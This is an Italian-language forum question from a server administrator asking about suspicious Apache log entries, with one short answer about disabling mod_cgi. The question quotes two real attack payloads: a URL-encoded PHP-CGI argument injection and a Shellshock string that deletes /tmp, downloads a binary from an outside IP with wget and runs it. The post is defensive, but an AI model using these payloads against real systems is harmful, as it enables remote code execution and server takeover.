Richieste dispari dai log di Apache

3

Ho monitorato alcune strane attività nei log di accesso per il mio sito e ho notato un paio di strani tentativi contro il server. Mi chiedo se qualcuno li abbia mai visti prima. È un server Apache 2.4.6.

Il primo che ha attirato la mia attenzione era

%63%67%69%2D%62%69%6E/%7 0%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D% 64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69 %6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74 %69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65 +%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F %69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D %30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76 %3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A %2F%2F%69%6E%70%75%74+%2D%6E

Questo è un URL codificato che decodifica in

cgi-bin/%7 0hp?-d allow_url_include=on -% 64 safe_mode=off -d suhosin.si mulation=on -d disable_funct ions="" -d open_basedir=none -d auto_prepend_file=php:// input -d cgi.force_redirect= 0 -d cgi.redirect_status_env =0 -d auto_prepend_file=php: //input -n

Non sono un amministratore esperto quindi non sono completamente sicuro di cosa stia tentando di fare. Sembra che stia provando a iniettare uno script CGI in / var / www / cgi-bin che reindirizza a qualche parte, qualcuno può dirmi cosa sta tentando di fare?

L'altro che ho notato sembra un tentativo di shellshock:

"() { :; }; /bin/bash -c \"rm -rf /tmp/;echo wget http://121.12.173.173:81/9521 -O /tmp /China.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo r m -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; } ; /bin/bash -c \"rm -rf /tmp/;echo wget http://121.12.173.173:81/9521 -O /tmp/C hina.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 / tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"

La mia ultima domanda è: c'è un modo per disabilitare completamente il modulo CGI per Apache senza ricompilarlo dal sorgente? Dalla mia lettura ho trovato che c'è un flag che può essere impostato in fase di compilazione per disabilitare completamente questo modulo. Il server ospita una pagina Web statica e basta, ho davvero bisogno della configurazione minima? Qualche consiglio?

    
posta daark 15.01.2015 - 15:14
fonte

1 risposta

0

Cerca nel tuo file httpd.conf. Trova la linea che carica il modulo mod_cgi e commentala. Riavvia il servizio Apache. Test per confermare che l'esecuzione CGI è disabilitata.

    
risposta data 15.01.2015 - 15:35
fonte

Leggi altre domande sui tag